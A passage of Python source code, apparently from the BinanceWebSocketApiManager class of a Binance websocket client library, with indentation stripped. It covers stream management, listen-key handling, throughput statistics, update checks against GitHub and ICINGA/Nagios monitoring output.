str(markets) + ", " + ", " + str(symbols) + ") - Can not create "
"'outboundAccountInfo' in a multi channel socket! "
"Unfortunately Binance only stream it in a single stream socket! ./"
"Use binance_websocket_api_manager.create_stream([\"arr\"], [\"!userData\"]) to "
"initiate an extra connection.")
return False
for market in markets:
if market == "!userData":
logging.error("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + ", " + str(symbols) + ") - Can not create "
"'outboundAccountInfo' in a multi channel socket! "
"Unfortunatly Binance only stream it in a single stream socket! ./"
"Use binance_websocket_api_manager.create_stream([\"arr\"], [\"!userData\"]) to "
"initiate an extra connection.")
return False
if "!" in channel:
query += channel + final_market
elif "!" in market:
query += market + final_channel
else:
query += market.lower() + "@" + channel
try:
if self.subscribe_to_stream(stream_id, markets=markets, channels=channels) is False:
sys.exit(1)
except KeyError:
pass
logging.info("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + ", " + str(symbols) + ") - Created websocket URI for stream_id=" +
str(stream_id) + " is " + self.websocket_base_uri + str(query))
return self.websocket_base_uri + str(query)
def delete_listen_key_by_stream_id(self, stream_id):
"""
Delete a binance listen_key from a specific !userData stream
:param stream_id: id of a !userData stream
:type stream_id: uuid
"""
try:
if self.stream_list[stream_id]['listen_key'] is not False:
logging.info("BinanceWebSocketApiManager.delete_listen_key_by_stream_id(" + str(stream_id) + ")")
self.restclient.delete_listen_key(stream_id)
except KeyError:
return False
def delete_stream_from_stream_list(self, stream_id):
"""
Delete a stream from the stream_list
Even if a stream crashes or get stopped, its data remains in the BinanceWebSocketApiManager till you stop the
BinanceWebSocketApiManager itself. If you want to tidy up the stream_list you can use this method.
:param stream_id: id of a stream
:type stream_id: uuid
:return: bool
"""
logging.info("BinanceWebSocketApiManager.delete_stream_from_stream_list(" + str(stream_id) + ")")
return self.stream_list.pop(stream_id, False)
def fill_up_space_left(self, demand_of_chars, string, filling=" "):
"""
Add whitespaces to `string` to a length of `demand_of_chars` on the left side
:param demand_of_chars: how much chars does the string have to have?
:type demand_of_chars: int
:param string: the string that has to get filled up with spaces
:type string: str
:param filling: filling char (default: blank space)
:type filling: str
:return: the filled up string
"""
blanks_pre = ""
blanks_post = ""
demand_of_blanks = demand_of_chars - len(str(string)) - 1
while len(blanks_pre) < demand_of_blanks:
blanks_pre += filling
blanks_post = filling
return blanks_pre + str(string) + blanks_post
def fill_up_space_centered(self, demand_of_chars, string, filling=" "):
"""
Add whitespaces to `string` to a length of `demand_of_chars`
:param demand_of_chars: how much chars does the string have to have?
:type demand_of_chars: int
:param string: the string that has to get filled up with spaces
:type string: str
:param filling: filling char (default: blank space)
:type filling: str
:return: the filled up string
"""
blanks_pre = ""
blanks_post = ""
demand_of_blanks = demand_of_chars - len(str(string)) - 1
while (len(blanks_pre)+len(blanks_post)) < demand_of_blanks:
blanks_pre += filling
if (len(blanks_pre) + len(blanks_post)) < demand_of_blanks:
blanks_post += filling
return blanks_pre + str(string) + blanks_post
def fill_up_space_right(self, demand_of_chars, string, filling=" "):
"""
Add whitespaces to `string` to a length of `demand_of_chars` on the right side
:param demand_of_chars: how much chars does the string have to have?
:type demand_of_chars: int
:param string: the string that has to get filled up with spaces
:type string: str
:param filling: filling char (default: blank space)
:type filling: str
:return: the filled up string
"""
blanks_pre = " "
blanks_post = ""
demand_of_blanks = demand_of_chars - len(str(string))
while len(blanks_post) < demand_of_blanks-1:
blanks_pre = filling
blanks_post += filling
string = blanks_pre + str(string) + blanks_post
return string[0:demand_of_chars]
def get_active_stream_list(self):
"""
Get a list of all active streams
:return: set or False
"""
# get the stream_list without stopped and crashed streams
stream_list_with_active_streams = {}
for stream_id in self.stream_list:
if self.stream_list[stream_id]['status'] == "running":
stream_list_with_active_streams[stream_id] = self.stream_list[stream_id]
try:
if len(stream_list_with_active_streams) > 0:
return stream_list_with_active_streams
except KeyError:
return False
except UnboundLocalError:
return False
def get_all_receives_last_second(self):
"""
Get the number of all receives of the last second
:return: int
"""
all_receives_last_second = 0
last_second_timestamp = int(time.time()) - 1
for stream_id in self.stream_list:
try:
all_receives_last_second += self.stream_list[stream_id]['receives_statistic_last_second']['entries'][
last_second_timestamp]
except KeyError:
pass
return all_receives_last_second
def get_binance_api_status(self):
"""
`get_binance_api_status()` is obsolete and will be removed in future releases, please use `get_used_weight()`
instead!
:return: dict
"""
logging.warning("`get_binance_api_status()` is obsolete and will be removed in future releases, please use"
"`get_used_weight()` instead!")
return self.binance_api_status
def get_used_weight(self):
"""
Get used_weight, last status_code and the timestamp of the last status update
:return: dict
"""
return self.binance_api_status
def get_current_receiving_speed(self, stream_id):
"""
Get the receiving speed of the last second in Bytes
:return: int
"""
current_timestamp = int(time.time())
last_timestamp = current_timestamp - 1
try:
if self.stream_list[stream_id]['transfer_rate_per_second']['bytes'][last_timestamp] > 0:
self.stream_list[stream_id]['transfer_rate_per_second']['speed'] = \
self.stream_list[stream_id]['transfer_rate_per_second']['bytes'][last_timestamp]
except TypeError:
return 0
except KeyError:
return 0
try:
current_receiving_speed = self.stream_list[stream_id]['transfer_rate_per_second']['speed']
except KeyError:
current_receiving_speed = 0
return current_receiving_speed
def get_current_receiving_speed_global(self):
"""
Get the receiving speed of the last second in Bytes from all streams!
:return: int
"""
current_receiving_speed = 0
try:
temp_stream_list = copy.deepcopy(self.stream_list)
except RuntimeError as error_msg:
logging.debug(f"BinanceWebSocketApiManager.get_current_receiving_speed_global() - RuntimeError: "
f"{str(error_msg)}")
return 0
except TypeError as error_msg:
logging.debug(f"BinanceWebSocketApiManager.get_current_receiving_speed_global() - RuntimeError: "
f"{str(error_msg)}")
return 0
for stream_id in temp_stream_list:
current_receiving_speed += self.get_current_receiving_speed(stream_id)
return current_receiving_speed
@staticmethod
def get_date_of_timestamp(timestamp):
"""
Convert a timestamp into a readable date/time format for humans
:param timestamp: provide the timestamp you want to convert into a date
:type timestamp: timestamp
:return: str
"""
date = str(datetime.utcfromtimestamp(timestamp).strftime('%Y-%m-%d, %H:%M:%S UTC'))
return date
def get_errors_from_endpoints(self):
"""
Get all the stored error messages from the ringbuffer sent by the endpoints.
:return: list
"""
return self.ringbuffer_error
def get_event_loop_by_stream_id(self, stream_id=False):
"""
Get the asyncio event loop used by a specific stream.
:return: asyncio event loop or False
"""
if stream_id is False:
return False
else:
return self.event_loops[stream_id]
def get_exchange(self):
"""
Get the name of the used exchange like "binance.com" or "binance.org-testnet"
:return: str
"""
return self.exchange
@staticmethod
def get_human_bytesize(bytes, suffix=""):
"""
Convert the bytes to something readable
:param bytes: amount of bytes
:type bytes: int
:param suffix: add a string after
:type suffix: str
:return:
"""
if bytes > 1024 * 1024 * 1024 *1024:
bytes = str(round(bytes / (1024 * 1024 * 1024 * 1024), 3)) + " tB" + suffix
elif bytes > 1024 * 1024 * 1024:
bytes = str(round(bytes / (1024 * 1024 * 1024), 2)) + " gB" + suffix
elif bytes > 1024 * 1024:
bytes = str(round(bytes / (1024 * 1024), 2)) + " mB" + suffix
elif bytes > 1024:
bytes = str(round(bytes / 1024, 2)) + " kB" + suffix
else:
bytes = str(bytes) + " B" + suffix
return bytes
@staticmethod
def get_human_uptime(uptime):
"""
Convert a timespan of seconds into hours, days, ...
:param uptime: Uptime in seconds
:type uptime: int
:return:
"""
if uptime > (60 * 60 * 24):
uptime_days = int(uptime / (60 * 60 * 24))
uptime_hours = int(((uptime - (uptime_days * (60 * 60 * 24))) / (60 * 60)))
uptime_minutes = int((uptime - ((uptime_days * (60 * 60 * 24)) + (uptime_hours * 60 * 60))) / 60)
uptime_seconds = int(
uptime - ((uptime_days * (60 * 60 * 24)) + ((uptime_hours * (60 * 60)) + (uptime_minutes * 60))))
uptime = str(uptime_days) + "d:" + str(uptime_hours) + "h:" + str(int(uptime_minutes)) + "m:" + str(
int(uptime_seconds)) + "s"
elif uptime > (60 * 60):
uptime_hours = int(uptime / (60 * 60))
uptime_minutes = int((uptime - (uptime_hours * (60 * 60))) / 60)
uptime_seconds = int(uptime - ((uptime_hours * (60 * 60)) + (uptime_minutes * 60)))
uptime = str(uptime_hours) + "h:" + str(int(uptime_minutes)) + "m:" + str(int(uptime_seconds)) + "s"
elif uptime > 60:
uptime_minutes = int(uptime / 60)
uptime_seconds = uptime - uptime_minutes * 60
uptime = str(uptime_minutes) + "m:" + str(int(uptime_seconds)) + "s"
else:
uptime = str(int(uptime)) + " seconds"
return uptime
@staticmethod
def get_latest_release_info():
"""
Get infos about the latest available release
:return: dict or False
"""
try:
respond = requests.get('https://api.github.com/repos/oliver-zehentleitner/unicorn-binance-websocket-api/'
'releases/latest')
latest_release_info = respond.json()
return latest_release_info
except Exception:
return False
@staticmethod
def get_latest_release_info_check_command():
"""
Get infos about the latest available `check_lucit_collector` release
:return: dict or False
"""
try:
respond = requests.get('https://api.github.com/repos/LUCIT-Development/check_lucit_collector.py/'
'releases/latest')
return respond.json()
except Exception:
return False
def get_latest_version(self):
"""
Get the version of the latest available release (cache time 1 hour)
:return: str or False
"""
# Do a fresh request if status is None or last timestamp is older 1 hour
if self.last_update_check_github['status'] is None or \
(self.last_update_check_github['timestamp']+(60*60) < time.time()):
self.last_update_check_github['status'] = self.get_latest_release_info()
if self.last_update_check_github['status']:
try:
return self.last_update_check_github['status']["tag_name"]
except KeyError:
return "unknown"
else:
return "unknown"
def get_latest_version_check_command(self):
"""
Get the version of the latest available `check_lucit_collector.py` release (cache time 1 hour)
:return: str or False
"""
# Do a fresh request if status is None or last timestamp is older 1 hour
if self.last_update_check_github_check_command['status'] is None or \
(self.last_update_check_github_check_command['timestamp'] + (60 * 60) < time.time()):
self.last_update_check_github_check_command['status'] = self.get_latest_release_info_check_command()
if self.last_update_check_github_check_command['status']:
try:
return self.last_update_check_github_check_command['status']["tag_name"]
except KeyError:
return "unknown"
else:
return "unknown"
def get_limit_of_subscriptions_per_stream(self):
"""
Get the number of allowed active subscriptions per stream (limit of binance API)
:return: int
"""
return self.max_subscriptions_per_stream
def get_number_of_all_subscriptions(self):
"""
Get the amount of all stream subscriptions
:return: inf
"""
subscriptions = 0
try:
active_stream_list = copy.deepcopy(self.get_active_stream_list())
if active_stream_list:
for stream_id in active_stream_list:
subscriptions += active_stream_list[stream_id]['subscriptions']
self.all_subscriptions_number = subscriptions
except TypeError:
return self.all_subscriptions_number
except RuntimeError:
return self.all_subscriptions_number
return subscriptions
def get_number_of_free_subscription_slots(self, stream_id):
"""
Get the number of free subscription slots (max allowed subscriptions - subscriptions) of a specific stream
:return: int
"""
free_slots = self.max_subscriptions_per_stream - self.stream_list[stream_id]['subscriptions']
return free_slots
def get_listen_key_from_restclient(self, stream_id, api_key, api_secret, symbols=False):
"""
Get a new or cached (<30m) listen_key
:param stream_id: provide a stream_id
:type stream_id: uuid
:param api_key: provide a valid Binance API key
:type api_key: str
:param api_secret: provide a valid Binance API secret
:type api_secret: str
:param symbols: provide the symbols for isolated_margin user_data streams
:type symbols: str
:return: str or False
"""
if (self.stream_list[stream_id]['start_time'] + self.stream_list[stream_id]['listen_key_cache_time']) > \
time.time() or (self.stream_list[stream_id]['last_static_ping_listen_key'] +
self.stream_list[stream_id]['listen_key_cache_time']) > time.time():
# listen_key is not older than 30 min
if self.stream_list[stream_id]['listen_key'] is not False:
response = {'listenKey': self.stream_list[stream_id]['listen_key']}
return response
# no cached listen_key or listen_key is older than 30 min
# acquire a new listen_key:
response = self.restclient.get_listen_key(stream_id)
if response:
# save and return the valid listen_key
try:
self.stream_list[stream_id]['listen_key'] = str(response['listenKey'])
return response
except KeyError:
# no valid listen_key, but a response from endpoint
return response
except TypeError:
return response
else:
# no valid listen_key
return False
def get_most_receives_per_second(self):
"""
Get the highest total receives per second value
:return: int
"""
return self.most_receives_per_second
def get_number_of_streams_in_stream_list(self):
"""
Get the number of streams that are stored in the stream_list
:return: int
"""
return len(self.stream_list)
def get_number_of_subscriptions(self, stream_id):
"""
Get the number of subscriptions of a specific stream
:return: int
"""
count_subscriptions = 0
for channel in self.stream_list[stream_id]['channels']:
if "!" in channel \
or channel == "orders" \
or channel == "accounts" \
or channel == "transfers" \
or channel == "allTickers" \
or channel == "allMiniTickers" \
or channel == "blockheight":
count_subscriptions += 1
continue
else:
for market in self.stream_list[stream_id]['markets']:
if "!" in market \
or market == "orders" \
or market == "accounts" \
or market == "transfers" \
or market == "allTickers" \
or market == "allMiniTickers" \
or market == "blockheight":
count_subscriptions += 1
else:
count_subscriptions += 1
return count_subscriptions
def get_keep_max_received_last_second_entries(self):
"""
Get the number of how much received_last_second entries are stored till they get deleted
:return: int
"""
return self.keep_max_received_last_second_entries
def get_monitoring_status_icinga(self, check_command_version=False, warn_on_update=True):
"""
Get status and perfdata to monitor and collect metrics with ICINGA/Nagios
status: OK, WARNING, CRITICAL
- WARNING: on restarts, available updates
- CRITICAL: crashed streams
perfdata:
- average receives per second since last status check
- average speed per second since last status check
- total received bytes since start
- total received length since start
- stream_buffer size
- stream_buffer length
- reconnects
- uptime
:param check_command_version: is the version of the calling `check_command <https://github.com/LUCIT-Development/check_lucit_collector.py>`_
:type check_command_version: str
:param warn_on_update: set to `False` to disable the update warning
:type warn_on_update: bool
:return: dict (text, time, return_code)
"""
result = self.get_monitoring_status_plain(check_command_version=check_command_version,
warn_on_update=warn_on_update)
if len(result['update_msg']) > 0 or len(result['status_msg']) > 0:
text_msg = " -" + str(result['status_msg']) + str(result['update_msg'])
else:
text_msg = ""
check_message = "BINANCE WEBSOCKETS (" + self.exchange + ") - " + result['status_text'] + ": O:" + \
str(result['active_streams']) + \
"/R:" + str(result['restarting_streams']) + "/C:" + str(result['crashed_streams']) + "/S:" + \
str(result['stopped_streams']) + text_msg + " | " + \
"active streams=" + str(result['active_streams']) + ";;;0 " + \
"average_receives_per_second=" + str(result['average_receives_per_second']) + \
";;;0 current_receiving_speed_per_second=" + str(result['average_speed_per_second']) + \
"KB;;;0 total_received_length=" + str(result['total_received_length']) + "c;;;0 total_" \
"received_size=" + str(result['total_received_mb']) + "MB;;;0 stream_buffer_size=" + \
str(result['stream_buffer_mb']) + "MB;;;0 stream_buffer_length=" + \
str(result['stream_buffer_items']) + ";;;0 reconnects=" + str(result['reconnects']) + "c;;;0 " \
"uptime_days=" + str(result['uptime']) + "c;;;0"
status = {'text': check_message,
'time': int(result['timestamp']),
'return_code': result['return_code']}
return status
def get_monitoring_status_plain(self, check_command_version=False, warn_on_update=True):
"""
Get plain monitoring status data:
active_streams, crashed_streams, restarting_streams, stopped_streams, return_code, status_text,
timestamp, update_msg, average_receives_per_second, average_speed_per_second, total_received_mb,
stream_buffer_items, stream_buffer_mb, reconnects, uptime
:param check_command_version: is the version of the calling `check_command <https://github.com/LUCIT-Development/check_lucit_collector.py>`_
:type check_command_version: False or str
:param warn_on_update: set to `False` to disable the update warning
:type warn_on_update: bool
:return: dict
"""
result = {}
result['active_streams'] = 0
result['crashed_streams'] = 0
result['restarting_streams'] = 0
result['highest_restart_per_stream_last_hour'] = 0
result['return_code'] = 0
result['status_text'] = "OK"
result['status_msg'] = ""
result['stopped_streams'] = 0
result['timestamp'] = time.time()
result['update_msg'] = ""
time_period = result['timestamp'] - self.last_monitoring_check
timestamp_last_hour = time.time() - (60*60)
try:
from unicorn_fy.unicorn_fy import UnicornFy
unicorn_fy = UnicornFy()
is_update_available_unicorn_fy = unicorn_fy.is_update_availabe()
except ModuleNotFoundError:
logging.critical("BinanceWebSocketApiManager.get_monitoring_status_plain() - UnicornFy not installed!")
is_update_available_unicorn_fy = False
except AttributeError:
logging.error("BinanceWebSocketApiManager.get_monitoring_status_plain() - UnicornFy outdated!")
is_update_available_unicorn_fy = True
if check_command_version:
is_update_available_check_command = self.is_update_availabe_check_command(
check_command_version=check_command_version)
else:
is_update_available_check_command = True
for stream_id in self.stream_list:
stream_restarts_last_hour = 0
for reconnect in self.stream_list[stream_id]['logged_reconnects']:
if reconnect > timestamp_last_hour:
stream_restarts_last_hour += 1
if stream_restarts_last_hour > result['highest_restart_per_stream_last_hour']:
result['highest_restart_per_stream_last_hour'] = stream_restarts_last_hour
for stream_id in self.stream_list:
if self.stream_list[stream_id]['status'] == "running":
result['active_streams'] += 1
elif self.stream_list[stream_id]['status'] == "stopped":
result['stopped_streams'] += 1
elif self.stream_list[stream_id]['status'] == "restarting":
result['restarting_streams'] += 1
elif "crashed" in self.stream_list[stream_id]['status']:
result['crashed_streams'] += 1
if self.is_update_availabe() and is_update_available_unicorn_fy and is_update_available_check_command:
result['update_msg'] = " Update available: UNICORN Binance WebSocket API, UnicornFy and " \
"check_lucit_collector.py!"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
elif self.is_update_availabe() and is_update_available_unicorn_fy:
result['update_msg'] = " Update available: UNICORN Binance WebSocket API and UnicornFy"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
elif self.is_update_availabe() and is_update_available_check_command:
result['update_msg'] = " Update available: UNICORN Binance WebSocket API and check_lucit_collector.py!"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
elif is_update_available_unicorn_fy and is_update_available_check_command:
result['update_msg'] = " Update available: UnicornFy and check_lucit_collector.py!"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
elif self.is_update_availabe():
result['update_msg'] = " Update " + str(self.get_latest_version()) + " available!"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
elif is_update_available_unicorn_fy:
result['update_msg'] = " Update UnicornFy " + str(unicorn_fy.get_latest_version()) + " available!"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
elif is_update_available_check_command:
result['update_msg'] = " Update `check_lucit_collector.py` " + \
str(self.get_latest_version_check_command()) + " available!"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
if result['highest_restart_per_stream_last_hour'] >= 10:
result['status_text'] = "CRITICAL"
result['return_code'] = 2
result['status_msg'] = " Restart rate per stream last hour: " + \
str(result['highest_restart_per_stream_last_hour'])
elif result['crashed_streams'] > 0:
result['status_text'] = "CRITICAL"
result['return_code'] = 2
elif result['highest_restart_per_stream_last_hour'] >= 3:
result['status_text'] = "WARNING"
result['return_code'] = 1
result['status_msg'] = " Restart rate per stream last hour: " + \
str(result['highest_restart_per_stream_last_hour'])
result['average_receives_per_second'] = ((self.total_receives - self.monitoring_total_receives) /
time_period).__round__(2)
result['average_speed_per_second'] = (((self.total_received_bytes - self.monitoring_total_received_bytes) /
time_period) / 1024).__round__(2)
result['total_received_mb'] = (self.get_total_received_bytes() / (1024 * 1024)).__round__(2)
result['total_received_length'] = self.total_receives
result['stream_buffer_items'] = str(self.get_stream_buffer_length())
result['stream_buffer_mb'] = (self.get_stream_buffer_byte_size() / (1024 * 1024)).__round__(4)
result['reconnects'] = self.get_reconnects()
self.monitoring_total_receives = self.get_total_receives()
self.monitoring_total_received_bytes = self.get_total_received_bytes()
self.last_monitoring_check = result['timestamp']
result['uptime'] = ((result['timestamp'] - self.start_time) / (60*60*24)).__round__(3)
return result
def get_process_usage_memory(self):
"""
Get the used memory of this process
:return: str
"""
process = psutil.Process(os.getpid())
memory = self.get_human_bytesize(process.memory_info()[0])
return memory
def get_process_usage_cpu(self):
"""
Get the used cpu power of this process
:return: int
"""
try:
cpu = psutil.cpu_percent(interval=None)
except OSError as error_msg:
logging.error(f"BinanceWebSocketApiManager.get_process_usage_cpu() - OSError - error_msg: {str(error_msg)}")
return False
return cpu
def get_process_usage_threads(self):
"""
Get the amount of threads that this process is using
:return: int
"""
threads = threading.active_count()
return threads
def get_reconnects(self):
"""
Get the number of total reconnects
:return: int
"""
return self.reconnects
def get_request_id(self):
"""
Get a unique `request_id`
:return: int
"""
with self.request_id_lock:
self.request_id += 1
return self.request_id
def get_result_by_request_id(self, request_id=False, timeout=10):
"""
Get the result related to the provided `request_id`
:param request_id: if you run `get_stream_subscriptions()
<https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager.BinanceWebSocketApiManager.get_stream_subscriptions>`_
it returns a unique `request_id` - provide it to this method to receive the result.
:type request_id: stream_id (uuid)
:param timeout: seconds to wait to receive the result. If not there it returns 'False'
:type timeout: int
:return: `result` or False
"""
if request_id is False:
return False
wait_till_timestamp = time.time() + timeout
while wait_till_timestamp >= time.time():
for result in self.ringbuffer_result:
result_dict = json.loads(result)
if result_dict['id'] == request_id:
return result
return False
def get_results_from_endpoints(self):
"""
Get all the stored result messages from the ringbuffer sent by the endpoints.
:return: list
"""
return self.ringbuffer_result
def get_ringbuffer_error_max_size(self):
"""
How many entries should be stored in the ringbuffer?
:return: int
"""
return self.ringbuffer_error_max_size
def get_ringbuffer_result_max_size(self):
"""
How many entries should be stored in the ringbuffer?
:return: int
"""
return self.ringbuffer_result_max_size
def get_start_time(self):
"""
Get the start_time of the BinanceWebSocketApiManager instance
:return: timestamp
"""
return self.start_time
def get_stream_buffer_byte_size(self):
"""
Get the current byte size estimation of the stream_buffer
:return: int
"""
total_received_bytes = self.get_total_received_bytes()
total_receives = self.get_total_receives()
stream_buffer_length = self.get_stream_buffer_length()
return round(total_received_bytes / total_receives * stream_buffer_length)
def get_stream_buffer_length(self):
"""
Get the current number of items in all stream_buffer
:return: int
"""
number = 0
number += len(self.stream_buffer)
for stream_buffer_name in self.stream_buffers:
number += len(self.stream_buffers[stream_buffer_name])
return number
def get_stream_id_by_label(self, stream_label=False):
"""
Get the stream_id of a specific stream by stream label
:param stream_label: stream_label of the stream you search
:type stream_label: str
:return: stream_id or False
"""
if stream_label:
for stream_id in self.stream_list:
if self.stream_list[stream_id]['stream_label'] == stream_label:
return stream_id
return False
def get_stream_info(self, stream_id):
"""
Get all infos about a specific stream
:param stream_id: id of a stream
:type stream_id: uuid
:return: set
"""
current_timestamp = time.time()
try:
temp_stream_list = copy.deepcopy(self.stream_list[stream_id])
except RuntimeError:
logging.error("BinanceWebSocketApiManager.get_stream_info(" + str(stream_id) + ") Info: RuntimeError")
return self.get_stream_info(stream_id)
except KeyError:
logging.error("BinanceWebSocketApiManager.get_stream_info(" + str(stream_id) + ") Info: KeyError")
return False
if temp_stream_list['last_heartbeat'] is not None:
temp_stream_list['seconds_to_last_heartbeat'] = \
current_timestamp - self.stream_list[stream_id]['last_heartbeat']
if temp_stream_list['has_stopped'] is not False:
temp_stream_list['seconds_since_has_stopped'] = \
int(current_timestamp) - int(self.stream_list[stream_id]['has_stopped'])
try:
self.stream_list[stream_id]['processed_receives_statistic'] = self.get_stream_statistic(stream_id)
except ZeroDivisionError:
pass
self.stream_list[stream_id]['transfer_rate_per_second']['speed'] = self.get_current_receiving_speed(stream_id)
return temp_stream_list
def get_stream_label(self, stream_id=False):
"""
Get the stream_label of a specific stream
:param stream_id: id of a stream
:type stream_id: uuid
:return: str or False
"""
if stream_id:
return self.stream_list[stream_id]['stream_label']
else:
return False
def get_stream_subscriptions(self, stream_id, request_id=False):
"""
Get a list of subscriptions of a specific stream from Binance endpoints - the result can be received via
the `stream_buffer` and is also added to the results ringbuffer - `get_results_from_endpoints()
<https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager.BinanceWebSocketApiManager.get_results_from_endpoints>`_
to get all results or use `get_result_by_request_id(request_id)
<https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager.BinanceWebSocketApiManager.get_result_by_request_id>`_
to get a specific one!
This function is supported by CEX endpoints only!
Info: https://github.com/binance-exchange/binance-official-api-docs/blob/master/web-socket-streams.md#listing-subscriptions
:param stream_id: id of a stream
:type stream_id: uuid
:param request_id: id to use for the request - use `get_request_id()` to create a unique id. If not provided or
`False`, then this method is using `get_request_id()
<https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager.BinanceWebSocketApiManager.get_request_id>`_
automatically.
:type request_id: int
:return: request_id (int)
"""
if request_id is False:
request_id = self.get_request_id()
if self.is_exchange_type('dex'):
logging.error("BinanceWebSocketApiManager.get_stream_subscriptions(" + str(stream_id) + ", " +
str(request_id) + ") DEX websockets dont support the listing of subscriptions! Request not "
"sent!")
return False
elif self.is_exchange_type('cex'):
payload = {"method": "LIST_SUBSCRIPTIONS",
"id": request_id}
self.stream_list[stream_id]['payload'].append(payload)
logging.info("BinanceWebSocketApiManager.get_stream_subscriptions(" + str(stream_id) + ", " +
str(request_id) + ") payload added!")
return request_id
else:
return False
def get_stream_list(self):
"""
Get a list of all streams
:return: set
"""
# get the stream list
temp_stream_list = {}
for stream_id in self.stream_list:
temp_stream_list[stream_id] = self.get_stream_info(stream_id)
return temp_stream_list
def get_stream_buffer_maxlen(self, stream_buffer_name=False):
"""
Get the maxlen value of the
`stream_buffer <https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/%60stream_buffer%60>`_
If maxlen is not specified or is None, `stream_buffer` may grow to an arbitrary length. Otherwise, the
`stream_buffer` is bounded to the specified maximum length. Once a bounded length `stream_buffer` is full, when
new items are added, a corresponding number of items are discarded from the opposite end.
:param stream_buffer_name: `False` to read from generic stream_buffer, the stream_id if you used True in
create_stream() or the string name of a shared stream_buffer.
:type stream_buffer_name: bool or str
:return: int or False
"""
if stream_buffer_name is False:
try:
return self.stream_buffer.maxlen
except IndexError:
return False
else:
try:
return self.stream_buffers[stream_buffer_name].maxlen
except IndexError:
return False
except KeyError:
return False
def get_stream_receives_last_second(self, stream_id):
"""
Get the number of receives of specific stream from the last seconds
:param stream_id: id of a stream
:type stream_id: uuid
:return: int
"""
last_second_timestamp = int(time.time()) - 1
try:
return self.stream_list[stream_id]['receives_statistic_last_second']['entries'][last_second_timestamp]
except KeyError:
return 0
def get_stream_statistic(self, stream_id):
"""
Get the statistic of a specific stream
:param stream_id: id of a stream
:type stream_id: uuid
:return: set
"""
stream_statistic = {'stream_receives_per_second': 0,
'stream_receives_per_minute': 0,
'stream_receives_per_hour': 0,
'stream_receives_per_day': 0,
'stream_receives_per_month': 0,
'stream_receives_per_year': 0}
if self.stream_list[stream_id]['status'] == "running":
stream_statistic['uptime'] = time.time() - self.stream_list[stream_id]['start_time']
elif self.stream_list[stream_id]['status'] == "stopped":
stream_statistic['uptime'] = self.stream_list[stream_id]['has_stopped'] - self.stream_list[stream_id]['start_time']
elif "crashed" in self.stream_list[stream_id]['status']:
stream_statistic['uptime'] = self.stream_list[stream_id]['has_stopped'] - self.stream_list[stream_id]['start_time']
elif self.stream_list[stream_id]['status'] == "restarting":
stream_statistic['uptime'] = time.time() - self.stream_list[stream_id]['start_time']
else:
stream_statistic['uptime'] = time.time() - self.stream_list[stream_id]['start_time']
try:
stream_receives_per_second = self.stream_list[stream_id]['processed_receives_total'] / stream_statistic['uptime']
except ZeroDivisionError:
stream_receives_per_second = 0
stream_statistic['stream_receives_per_second'] = stream_receives_per_second
if stream_statistic['uptime'] > 60:
stream_statistic['stream_receives_per_minute'] = stream_receives_per_second * 60
if stream_statistic['uptime'] > 60 * 60:
stream_statistic['stream_receives_per_hour'] = stream_receives_per_second * 60 * 60
if stream_statistic['uptime'] > 60 * 60 * 24:
stream_statistic['stream_receives_per_day'] = stream_receives_per_second * 60 * 60 * 24
if stream_statistic['uptime'] > 60 * 60 * 24 * 30:
stream_statistic['stream_receives_per_month'] = stream_receives_per_second * 60 * 60 * 24 * 30
if stream_statistic['uptime'] > 60 * 60 * 24 * 30 * 12:
stream_statistic['stream_receives_per_year'] = stream_receives_per_second * 60 * 60 * 24 * 30 * 12
return stream_statistic
def get_total_received_bytes(self):
"""
Get number of total received bytes
:return: int
"""
# how much bytes did we receive till now?
return self.total_received_bytes
def get_total_receives(self):
"""
Get the number of total receives
:return: int
"""
return self.total_receives
def get_user_agent(self):
"""
Get the user_agent string "lib name + lib version + python version"
:return:
"""
user_agent = f"{self.name}_{str(self.get_version())}-python_{str(platform.python_version())}"
return user_agent
def get_version(self):
"""
Get the package/module version
:return: str
"""
return self.version
def get_version_unicorn_fy(self):
"""
Get the package/module version of `UnicornFy <https://github.com/oliver-zehentleitner/unicorn-fy>`_
:return: str
"""
from unicorn_fy.unicorn_fy import UnicornFy
unicorn_fy = UnicornFy()
return unicorn_fy.get_version()
@staticmethod
def help():
"""
Help in iPython
"""
print("Ctrl+D to close")
def increase_received_bytes_per_second(self, stream_id, size):
"""
Add the amount of received bytes per second
:param stream_id: id of a stream
:type stream_id: uuid
:param size: amount of bytes to add
:type size: int
"""
current_timestamp = int(time.time())
try:
if self.stream_list[stream_id]['transfer_rate_per_second']['bytes'][current_timestamp]:
pass
except KeyError:
self.stream_list[stream_id]['transfer_rate_per_second']['bytes'][current_timestamp] = 0
try:
self.stream_list[stream_id]['transfer_rate_per_second']['bytes'][current_timestamp] += size
except KeyError:
pass
def increase_processed_receives_statistic(self, stream_id):
"""
Add the number of processed receives
:param stream_id: id of a stream
:type stream_id: uuid
"""
current_timestamp = int(time.time())
try:
self.stream_list[stream_id]['processed_receives_total'] += 1
except KeyError:
return False
try:
with self.stream_threading_lock[stream_id]['receives_statistic_last_second_lock']:
self.stream_list[stream_id]['receives_statistic_last_second']['entries'][current_timestamp] += 1
except KeyError:
with self.stream_threading_lock[stream_id]['receives_statistic_last_second_lock']:
self.stream_list[stream_id]['receives_statistic_last_second']['entries'][current_timestamp] = 1
with self.total_receives_lock:
self.total_receives += 1
def increase_reconnect_counter(self, stream_id):
"""
Increase reconnect counter
:param stream_id: id of a stream
:type stream_id: uuid
"""
